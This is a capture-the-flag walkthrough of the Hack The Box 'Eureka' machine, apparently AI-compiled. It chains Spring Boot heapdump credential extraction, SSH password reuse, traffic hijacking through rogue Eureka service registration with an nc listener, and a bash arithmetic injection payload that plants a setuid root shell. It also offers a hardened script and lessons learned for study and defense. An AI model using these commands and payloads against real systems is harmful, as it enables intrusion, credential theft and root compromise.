HTB Eureka Machine Writeup (Walkthrough)

Note: This writeup was generated by AI based on multiple existing writeups and technical documentation.

Target Information

  • Target IP: 10.10.11.66
  • Difficulty: Hard
  • Operating System: Linux (Ubuntu 20.04.6 LTS)

Initial Reconnaissance

Nmap Scan

nmap -p- --min-rate 10000 10.10.11.66
nmap -p 22,80,8761 -sCV 10.10.11.66

Results:

  • Port 22: SSH OpenSSH 8.2p1 Ubuntu
  • Port 80: nginx 1.18.0 (redirects to furni.htb)
  • Port 8761: HTTP service requiring basic authentication (later identified as the Netflix Eureka server)

Added furni.htb to /etc/hosts:

echo "10.10.11.66 furni.htb" >> /etc/hosts

Web Application Analysis

The main site at http://furni.htb is a furniture store built with the Spring Boot framework. Key observations:

  • Spring Boot application (confirmed by 404 error page)
  • Registration and login functionality available
  • Shopping cart features

Directory Enumeration

Used a Spring Boot-specific wordlist to discover actuator endpoints:

feroxbuster -u http://furni.htb -w /opt/SecLists/Discovery/Web-Content/spring-boot.txt --dont-extract-links

Critical Discovery: /actuator/heapdump endpoint exposed

Initial Access - Spring Boot Heapdump Analysis

Heapdump Exploitation

Downloaded the heapdump file:

wget http://furni.htb/actuator/heapdump

Analysis Method 1: Strings

strings heapdump | grep -B 2 -A 2 "Authorization"

Found a base64-encoded Authorization header:

Authorization: Basic RXVyZWthU3J2cjowc2NhclBXRGlzVGhlQjNzdA==

Decoded to: EurekaSrvr:0scarPWDisTheB3st

Analysis Method 2: VisualVM

  • Loaded heapdump into VisualVM
  • Searched for database-related objects
  • Found MySQL connection string with credentials

Analysis Method 3: JDumpSpider

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

Extracted Credentials

  1. Database Credentials: oscar190:0sc@r190_S0l!dP@sswd
  2. Eureka Service: EurekaSrvr:0scarPWDisTheB3st

SSH Access

ssh oscar190@10.10.11.66
# Password: 0sc@r190_S0l!dP@sswd

Successfully gained shell as oscar190.

Privilege Escalation - User Flag

Eureka Service Discovery

Discovered a Netflix Eureka service registry running on port 8761. Eureka provides service discovery and client-side load balancing in microservice architectures: services register themselves with the registry, and other services look up where to send traffic.

Configuration Analysis: Located Eureka configuration in /var/www/web/Eureka-Server/target/classes/application.yaml:

spring:
  security:
    user:
      name: EurekaSrvr
      password: 0scarPWDisTheB3st

Service Architecture Discovery

Found multiple Spring Boot applications:

  • cloud-gateway [TCP 8080] - Spring Cloud Gateway
  • User Management [TCP 8081] - User authentication service
  • Furni website [TCP 8082] - Main e-commerce site
  • Eureka server [TCP 8761] - Service registry

Traffic Hijacking Attack

Objective: Intercept miranda-wise user’s login attempts

Process Monitoring: Used pspy to identify automated login attempts:

/bin/bash /opt/scripts/miranda-Login-Simulator.sh

Attack Strategy:

  1. Access Eureka dashboard at http://furni.htb:8761
  2. Register malicious service instance to hijack traffic
  3. Replace legitimate USER-MANAGEMENT-SERVICE with attacker-controlled instance

Malicious Service Registration:

curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE \
  -H 'Content-Type: application/json' \
  -d '{
  "instance": {
    "instanceId": "attacker-instance",
    "hostName": "10.10.14.6",
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "10.10.14.6",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": {
      "$": 8081,
      "@enabled": "true"
    },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}'

Traffic Interception: Set up a listener on port 8081 to receive the traffic the gateway now routes to the registered instance:

nc -lnvp 8081

Captured Credentials:

POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_csrf=...

URL decoded password: IL!veT0Be&BeT0L0ve

SSH as miranda-wise

ssh miranda-wise@10.10.11.66
# Password: IL!veT0Be&BeT0L0ve

Retrieved user flag:

cat /home/miranda-wise/user.txt

Root Privilege Escalation

System Analysis

Group Membership: miranda-wise is a member of the developers group, which has write access to the /var/www/web directory.

Process Monitoring: Identified automated log analysis script:

2025/04/30 14:42:03 CMD: UID=0 PID=1404997 | /bin/bash /opt/log_analyse.sh /var/www/web/cloud-gateway/log/application.log

Vulnerable Script Analysis

Located /opt/log_analyse.sh, a log analysis script run as root by cron, with a command injection vulnerability in its analyze_http_statuses() function:

analyze_http_statuses() {
    # Iterate over every log line that matches "HTTP ... Status: "
    while IFS= read -r line; do
        # Extract everything after "Status: " with no check that it is numeric
        code=$(echo "$line" | grep -oP 'Status: \K.*')
        # ... processing logic ...
        # Inside [[ ]], -eq evaluates both operands as arithmetic expressions,
        # so the attacker-controlled $code is interpreted, not just compared
        if [[ "$existing_code" -eq "$code" ]]; then  # VULNERABLE LINE
            new_count=$((existing_count + 1))
            STATUS_CODES[$i]="${existing_code}:${new_count}"
            break
        fi
    done < <(grep "HTTP.*Status: " "$LOG_FILE")
}

Vulnerability: Inside [[ ]], the -eq operator treats both operands as arithmetic expressions rather than plain strings. Arithmetic evaluation expands array subscripts, so an extracted status such as x[$(command)] causes the command substitution inside the subscript to run, with the privileges of the script (root, since cron executes it as UID 0).
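A hardened replacement for the status-tally logic, added here as an example and not part of the original /opt/log_analyse.sh: the extracted value is accepted only if it is exactly three digits, and counting is done with text tools rather than bash arithmetic, so an entry like the one described above is reported and skipped instead of evaluated. The log lines below are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not the original /opt/log_analyse.sh.
# count_statuses LOGFILE: print "code:count" for each distinct HTTP status.
# Untrusted log text never reaches [[ -eq ]] or $(( )), so an entry such as
# "HTTP Status: x[$(cmd)]" is rejected rather than executed.
count_statuses() {
    log_file="$1"
    grep 'HTTP.*Status: ' "$log_file" | while IFS= read -r line; do
        # Same extraction as the original script: everything after "Status: "
        code=${line##*"Status: "}
        case "$code" in
            # Allowlist: exactly three ASCII digits is the only accepted shape
            [0-9][0-9][0-9]) printf '%s\n' "$code" ;;
            *) printf 'rejected non-numeric status: %s\n' "$code" >&2 ;;
        esac
    done | sort | uniq -c | awk '{ print $2 ":" $1 }'
}

# Constructed sample log (not captured from the box). The fourth line is the
# kind of entry that the vulnerable -eq comparison would have executed.
SAMPLE_LOG=$(mktemp)
cat >"$SAMPLE_LOG" <<'EOF'
2025/04/30 14:42:03 GET /login HTTP/1.1 Status: 200
2025/04/30 14:42:04 POST /login HTTP/1.1 Status: 302
2025/04/30 14:42:05 GET /admin HTTP/1.1 Status: 403
HTTP Status: x[$(echo injected-command-ran)]
2025/04/30 14:42:06 GET /login HTTP/1.1 Status: 200
EOF

count_statuses "$SAMPLE_LOG"
# Expected: 200:2 / 302:1 / 403:1 on stdout, one rejection notice on stderr
```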

Exploitation Strategy

Log File Manipulation: Although direct write access to the log file itself is denied, the developers group has write permission on the containing directory, which is enough to delete the file and recreate it with arbitrary content.

Payload Construction:

# Remove existing log file
rm /var/www/web/cloud-gateway/log/application.log

# Create malicious log entry
echo 'HTTP Status: x[$(cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash)]' > /var/www/web/cloud-gateway/log/application.log

Exploitation Process:

  1. Wait for cron job to execute log analysis script
  2. Script processes malicious log entry
  3. Arithmetic evaluation triggers command execution
  4. SetUID bash binary created

Root Shell

# Execute SetUID bash with preserved permissions
/tmp/rootbash -p

Retrieved root flag:

cat /root/root.txt

Key Attack Vectors Summary

  1. Spring Boot Actuator Misconfiguration: Exposed heapdump containing sensitive credentials
  2. Password Reuse: Database credentials valid for SSH access
  3. Netflix Eureka Traffic Hijacking: Service registry manipulation to intercept user authentication
  4. Bash Arithmetic Injection: Command injection via vulnerable log analysis script

Tools Used

  • nmap: Port scanning and service enumeration
  • feroxbuster: Web directory fuzzing
  • VisualVM: Java heapdump analysis
  • JDumpSpider: Automated heapdump credential extraction
  • pspy: Process monitoring
  • curl: HTTP requests and API interaction
  • netcat: Traffic interception

Lessons Learned

  1. Actuator Security: Spring Boot actuator endpoints should be properly secured and not exposed publicly
  2. Service Registry Security: Netflix Eureka requires proper authentication and authorization
  3. Input Validation: Bash scripts that process untrusted input (such as log content) must validate it before arithmetic comparison to prevent injection attacks
  4. Credential Management: Avoid storing sensitive credentials in memory dumps or configuration files
  5. Principle of Least Privilege: Users should have minimal necessary permissions

Timeline

  • Reconnaissance: ~15 minutes
  • Initial Access: ~30 minutes (heapdump analysis)
  • User Privilege Escalation: ~45 minutes (Eureka exploitation)
  • Root Privilege Escalation: ~30 minutes (script analysis and exploitation)
  • Total Time: ~2 hours

Done!

This post is licensed under CC BY 4.0 by the author.